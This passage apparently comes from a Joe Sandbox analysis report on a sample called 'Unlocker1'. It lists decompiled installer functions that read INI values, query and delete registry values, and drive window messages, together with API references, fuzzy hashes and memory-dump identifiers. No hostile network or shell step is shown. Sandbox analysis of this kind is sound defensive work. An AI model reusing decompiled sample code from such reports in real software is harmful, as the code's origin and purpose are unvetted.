                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Enum$CloseOpenValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 167947723-0
                                                                                                                                                              • Opcode ID: e2f80b80baa03604ef96cc0b5eb0a812df5ce76e2325c321a32b65c77b87080a
                                                                                                                                                              • Instruction ID: 323df63ddd6a9f09ec1088b6260a8986ee2a6ccff1f267de23e4284cd7b62ed6
                                                                                                                                                              • Opcode Fuzzy Hash: e2f80b80baa03604ef96cc0b5eb0a812df5ce76e2325c321a32b65c77b87080a
                                                                                                                                                              • Instruction Fuzzy Hash: 2BF0A271A04201EFE715AF659E88EBB7A6CDB40388F10843FF406A61C0D2B85D42967A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402267 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402267(char __ebx) {
				CHAR* _t8;
				CHAR* _t10;
				CHAR* _t20;
				void* _t22;
				void* _t25;

				 *(_t22 + 8) = 0x7e4e21;
				_t8 = E004029F6(1);
				 *(_t22 - 0x30) = E004029F6(0x12);
				_t10 = E004029F6(0xffffffdd);
				_t3 = _t22 + 8; // 0x7e4e21
				GetPrivateProfileStringA(_t8,  *(_t22 - 0x30), _t3, _t20, 0x3ff, _t10); // executed
				_t25 =  *_t20 -  *(_t22 + 8);
				if(_t25 == 0) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
					 *_t20 = __ebx;
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}








                                                                                                                                                              0x00402269
                                                                                                                                                              0x00402270
                                                                                                                                                              0x00402280
                                                                                                                                                              0x00402283
                                                                                                                                                              0x0040228e
                                                                                                                                                              0x00402297
                                                                                                                                                              0x0040229f
                                                                                                                                                              0x00401716
                                                                                                                                                              0x00402630
                                                                                                                                                              0x00402637
                                                                                                                                                              0x00402637
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,?,!N~,?,000003FF,00000000), ref: 00402297
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString
                                                                                                                                                              • String ID: !N~
                                                                                                                                                              • API String ID: 1096422788-529124213
                                                                                                                                                              • Opcode ID: 83959307df37686c86d75e4de7286cd2fa4b3ebc5ce89ae33a3a58613c6f73fc
                                                                                                                                                              • Instruction ID: 21cd7503a9a85725414fd2f210def48a3ed87e9b9f52c0cacc02f36f79452d1c
                                                                                                                                                              • Opcode Fuzzy Hash: 83959307df37686c86d75e4de7286cd2fa4b3ebc5ce89ae33a3a58613c6f73fc
                                                                                                                                                              • Instruction Fuzzy Hash: E4E04F71900208BBDB50AFA1CD49DAE3AA8BF043C4F100129FA10AB1C1DBB89541AB55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00403D68 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00403D68(int _a4) {
				long _t3;

				if(_a4 == 0x78) {
					 *0x42364c =  *0x42364c + 1;
				}
				_t3 = SendMessageA( *0x423e88, 0x408, _a4, 0); // executed
				return _t3;
			}




                                                                                                                                                              0x00403d6d
                                                                                                                                                              0x00403d6f
                                                                                                                                                              0x00403d6f
                                                                                                                                                              0x00403d86
                                                                                                                                                              0x00403d8c

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(00000408,?,00000000,004039CA), ref: 00403D86
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID: x
                                                                                                                                                              • API String ID: 3850602802-2363233923
                                                                                                                                                              • Opcode ID: 6926c423e0dcef9ab9601c7f0ae131e386b0104a6a9bceae863fc1186920576c
                                                                                                                                                              • Instruction ID: 94c74e5a5aacbaad69a3bdfcf154c9035d8ded6a0e65b23c0d63679f04543271
                                                                                                                                                              • Opcode Fuzzy Hash: 6926c423e0dcef9ab9601c7f0ae131e386b0104a6a9bceae863fc1186920576c
                                                                                                                                                              • Instruction Fuzzy Hash: FBC012B2A84200BBCA206F00EE00F0A7A36EB60B03F10803DF344202B482789622DB1E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004023AF Relevance: 3.1, APIs: 2, Instructions: 57registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E004023AF(int* __ebx, char* __esi) {
				char* _t19;
				void* _t35;
				void* _t39;
				void* _t42;

				_t37 = __esi;
				_t29 = __ebx;
				_t35 = E00402B00(_t42, 0x20019);
				_t19 = E004029F6(0x33);
				 *__esi = __ebx;
				if(_t35 == __ebx) {
					 *(_t39 - 4) = 1;
				} else {
					 *(_t39 - 8) = 0x3ff;
					if(RegQueryValueExA(_t35, _t19, __ebx, _t39 + 8, __esi, _t39 - 8) != 0) {
						L7:
						 *_t37 = _t29;
						 *(_t39 - 4) = 1;
					} else {
						if( *(_t39 + 8) == 4) {
							__eflags =  *(_t39 - 0x14) - __ebx;
							 *(_t39 - 4) = 0 |  *(_t39 - 0x14) == __ebx;
							E0040593B(__esi,  *__esi);
						} else {
							if( *(_t39 + 8) == 1 ||  *(_t39 + 8) == 2) {
								 *(_t39 - 4) =  *(_t39 - 0x14);
								_t37[ *(_t39 - 8)] = _t29;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x423f08 =  *0x423f08 +  *(_t39 - 4);
				return 0;
			}







                                                                                                                                                              0x004023af
                                                                                                                                                              0x004023af
                                                                                                                                                              0x004023bb
                                                                                                                                                              0x004023bd
                                                                                                                                                              0x004023c4
                                                                                                                                                              0x004023c6
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x004023cc
                                                                                                                                                              0x004023cf
                                                                                                                                                              0x004023ea
                                                                                                                                                              0x00402420
                                                                                                                                                              0x00402420
                                                                                                                                                              0x00402422
                                                                                                                                                              0x004023ec
                                                                                                                                                              0x004023f0
                                                                                                                                                              0x0040240f
                                                                                                                                                              0x00402416
                                                                                                                                                              0x00402419
                                                                                                                                                              0x004023f2
                                                                                                                                                              0x004023f5
                                                                                                                                                              0x00402400
                                                                                                                                                              0x00402406
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004023f5
                                                                                                                                                              0x004023f0
                                                                                                                                                              0x0040247c
                                                                                                                                                              0x0040247d
                                                                                                                                                              0x0040247d
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402B00: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,000003FF,?,?,?,?,00000033), ref: 004023DF
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: 507b692e60eeee5e00a9f3c11261afc4d4aba39ebd03dc0eae597370735b97e4
                                                                                                                                                              • Instruction ID: 77d51f223b4f01b007ab8b3a7146475204ba0a4990bfb8161fa5a86846697e19
                                                                                                                                                              • Opcode Fuzzy Hash: 507b692e60eeee5e00a9f3c11261afc4d4aba39ebd03dc0eae597370735b97e4
                                                                                                                                                              • Instruction Fuzzy Hash: 8611E371901205EFDB15DF64CA889AF7BB4EF14348F20807FE442B72C1D2B88A45EB5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423eb0; // 0x740e84
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42366c =  *0x42366c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42366c, 0x7530,  *0x423654), 0); // executed
					}
				}
				return 0;
			}












                                                                                                                                                              0x0040138a
                                                                                                                                                              0x004013fa
                                                                                                                                                              0x00401392
                                                                                                                                                              0x0040139b
                                                                                                                                                              0x004013a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004013a2
                                                                                                                                                              0x004013a3
                                                                                                                                                              0x004013ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401404
                                                                                                                                                              0x004013b0
                                                                                                                                                              0x004013b7
                                                                                                                                                              0x004013bd
                                                                                                                                                              0x004013be
                                                                                                                                                              0x004013c0
                                                                                                                                                              0x004013c2
                                                                                                                                                              0x004013b9
                                                                                                                                                              0x004013b9
                                                                                                                                                              0x004013ba
                                                                                                                                                              0x004013ba
                                                                                                                                                              0x004013c9
                                                                                                                                                              0x004013cb
                                                                                                                                                              0x004013f4
                                                                                                                                                              0x004013f4
                                                                                                                                                              0x004013c9
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                                                              • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                                                                                                                                              • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                                                              • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004022A7 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004022A7(void* __ebx) {
				char* _t6;
				void* _t11;
				long _t13;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x14) - __ebx;
				if( *(_t23 - 0x14) != __ebx) {
					_t6 = E004029F6(0x22);
					_t18 =  *(_t23 - 0x14) & 0x00000002;
					__eflags =  *(_t23 - 0x14) & 0x00000002;
					_t19 = E00402A36(E00402AEB( *((intOrPtr*)(_t23 - 0x20))), _t6, _t18);
					goto L4;
				} else {
					_t11 = E00402B00(_t26, 2); // executed
					_t22 = _t11;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t13 = RegDeleteValueA(_t22, E004029F6(0x33)); // executed
						_t19 = _t13;
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}










                                                                                                                                                              0x004022a7
                                                                                                                                                              0x004022a7
                                                                                                                                                              0x004022aa
                                                                                                                                                              0x004022d9
                                                                                                                                                              0x004022e1
                                                                                                                                                              0x004022e1
                                                                                                                                                              0x004022f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004022ac
                                                                                                                                                              0x004022ae
                                                                                                                                                              0x004022b3
                                                                                                                                                              0x004022b7
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x004022bd
                                                                                                                                                              0x004022c6
                                                                                                                                                              0x004022cd
                                                                                                                                                              0x004022cf
                                                                                                                                                              0x004022f6
                                                                                                                                                              0x004022f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004022fe
                                                                                                                                                              0x004022f8
                                                                                                                                                              0x004022b7
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402B00: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              • RegDeleteValueA.KERNELBASE(00000000,00000000,00000033), ref: 004022C6
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022CF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 849931509-0
                                                                                                                                                              • Opcode ID: ee70e0c8ea5e76c5473df7986e6ddf19852834f1384ac6f07000c38f1b823d4b
                                                                                                                                                              • Instruction ID: c586e56b1d430ee1cb1ae4f59be608967060f6779667f9d5bdce91e390546033
                                                                                                                                                              • Opcode Fuzzy Hash: ee70e0c8ea5e76c5473df7986e6ddf19852834f1384ac6f07000c38f1b823d4b
                                                                                                                                                              • Instruction Fuzzy Hash: B9F04472A00211ABDB20BFA49F4DABF7268AB40354F10453BF601B61C1D9B94D42A66D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00404E4D Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00404E4D(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x423ea8; // 0x73f1dc
				_t10 =  *0x423eac; // 0x7
				__imp__OleInitialize(0);
				 *0x423f38 =  *0x423f38 | __eax;
				E00403DDB(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x418;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x423f0c =  *0x423f0c + 1;
				}
				L7:
				E00403DDB(0x404); // executed
				__imp__OleUninitialize();
				_t8 =  *0x423f0c; // 0x0
				return _t8;
			}








                                                                                                                                                              0x00404e4e
                                                                                                                                                              0x00404e55
                                                                                                                                                              0x00404e5d
                                                                                                                                                              0x00404e63
                                                                                                                                                              0x00404e6b
                                                                                                                                                              0x00404e72
                                                                                                                                                              0x00404e74
                                                                                                                                                              0x00404e77
                                                                                                                                                              0x00404e77
                                                                                                                                                              0x00404e7c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404e8d
                                                                                                                                                              0x00404e95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404e97
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404e95
                                                                                                                                                              0x00404e99
                                                                                                                                                              0x00404e99
                                                                                                                                                              0x00404e9f
                                                                                                                                                              0x00404ea4
                                                                                                                                                              0x00404ea9
                                                                                                                                                              0x00404eaf
                                                                                                                                                              0x00404eb6

                                                                                                                                                              APIs
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00404E5D
                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageA.USER32(0014005A,00000000,00000000,00000000), ref: 00403DED
                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 00404EA9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                                              • Opcode ID: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                                                              • Instruction ID: dd00d1d9fa511fdb2abfd92f861b37bc179417f7df103cd37a6f8771cbc5aef0
                                                                                                                                                              • Opcode Fuzzy Hash: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                                                              • Instruction Fuzzy Hash: D3F0F0B2A00200AAD7201F64ED00B167BB4ABC0316F06003BFF04B62E0D3795802869D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402866 Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00402866(signed int __eax) {
				RECT* _t10;
				signed int _t12;
				void* _t16;

				_t12 =  *0x421478; // 0x1
				SendMessageA( *(_t16 - 0x34), 0xb, _t12 & __eax, _t10); // executed
				if( *((intOrPtr*)(_t16 - 0x24)) != _t10) {
					InvalidateRect( *(_t16 - 0x34), _t10, _t10);
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}






                                                                                                                                                              0x00402866
                                                                                                                                                              0x00402875
                                                                                                                                                              0x0040287e
                                                                                                                                                              0x00402885
                                                                                                                                                              0x00402885
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,0000000B,00000001), ref: 00402875
                                                                                                                                                              • InvalidateRect.USER32(?), ref: 00402885
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 909852535-0
                                                                                                                                                              • Opcode ID: 46183b671d0a66796b8da51e49bc5f75bb78f43e79dd776066acc7c5e036528c
                                                                                                                                                              • Instruction ID: 649a040586aa62cc82974a2302a351b88b3488b792cf185d27debadfb860ecc8
                                                                                                                                                              • Opcode Fuzzy Hash: 46183b671d0a66796b8da51e49bc5f75bb78f43e79dd776066acc7c5e036528c
                                                                                                                                                              • Instruction Fuzzy Hash: 34E08C72B00104BFEB10DFA4FE859AE7BBAEB40349B1000BAF201F10A0D2351D00CA28
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401D95 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DAB
                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                              • Opcode ID: 180e04144bc7a0d59582f7e45b03d1942a0b442326c071ed28d9fde4447ebb30
